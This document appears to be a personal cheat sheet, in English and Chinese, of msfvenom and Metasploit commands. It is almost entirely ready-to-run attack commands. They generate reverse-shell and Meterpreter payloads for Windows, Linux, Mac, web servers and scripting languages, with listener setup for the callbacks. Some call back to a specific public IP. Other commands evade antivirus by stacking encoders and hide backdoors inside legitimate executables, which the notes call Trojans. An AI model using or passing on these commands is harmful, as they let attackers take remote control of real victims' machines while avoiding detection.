Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '
' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
接受反弹:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.76.132
set LPORT 1111
exploit
具体使用:
生成木马:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=81.71.25.1 lport=7001 --platform win -f exe -o /home/kali/Desktop/54320.exe
监控:
nc -l -p 7001
或者:
msfconsole
use exploit/multi/handler
//set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.33.143
set LPORT 7001
exploit
msf即Metasploit Framework,可以用来漏洞利用。漏洞探测等功能,是一个非常好的工具
是一个框架,可以改动
-msfvenom -p windows/shell_reverse_tcp lhost=192.168.33.135 lport=7001 -a x86 --platform win -f exe -o a.exe
-p 指定payload路径
lhost=1.1.1.1 lport=4444 //
-a x86 //操作系统的架构
--platform win //平台,win是windows 平台
-f exe //输出格式,这里是exe格式输出
-o //输出的名字
加密生成shell
msfvenom -p windows/shell/bind_tcp lhost=192.168.33.135 lport=7001 -f raw -e
x86/shikata_ga_nai -i 6 | msfvenom -a x86 --platform windows -e x86/
countdown -i 7 -f raw | msfvenom -a x86 --platform windows -e x86/
shikata_ga_nai -i 9 -b 'x00' -f exe -o b.exe
-f raw 以原始的模式输出
-e 接加密编码模块 -i 接数字加密多少次 | ....再次加密
-b ‘xoo’ 把xoo特色字符处理掉
generate -b 'x00xff' -f exe -o /home/1.exe
把后门绑定在其他模板上:-x
msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=192.168.33.135 lport=7001 -arch x86 --platform win -f exe -o c.exe
直接在linux上运行下面命令生成木马
普通反弹tcp(shell_reverse_tcp):
msfvenom -p windows/shell_reverse_tcp lhost=81.71.25.1 lport=54322 --platform win -f exe -o /home/kali/Desktop/5432.exe
利用:可以直接用nc连接,或者msf不用设payload
利用反弹meterpreter_tcp/http:
msfvenom -p windows/meterpreter/reverse_tcp lhost=81.71.25.1 lport=54322 --platform win -f exe -o /home/kali/Desktop/54320.exe
使用加密:
msfvenom -p windows/meterpreter/reverse_http lhost=81.71.25.1 lport=54322 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -b 'x00' -f exe -o /home/kali/Desktop/meter_http_msfjiami_54322
加密绑定文件(有时候文件无法正常使用):
msfvenom -p windows/meterpreter/reverse_http lhost=81.71.25.1 lport=54322 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -b 'x00' -k-x /home/kali/Desktop/key.exe -f exe -o /home/kali/Desktop/54322_key_http_msfjiami.exe
不加密绑定文件:
msfvenom -p windows/meterpreter/reverse_http -k-x /home/kali/Desktop/bing.exe lhost=81.71.25.1 lport=54322 --platform win -f exe -o /home/kali/Desktop/54322_bing.exe
生成源码:
msfvenom -p windows/meterpreter/reverse_http lhost=81.71.25.1 lport=54322 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 15 -f csharp -o /home/kali/Desktop/yuanma.txt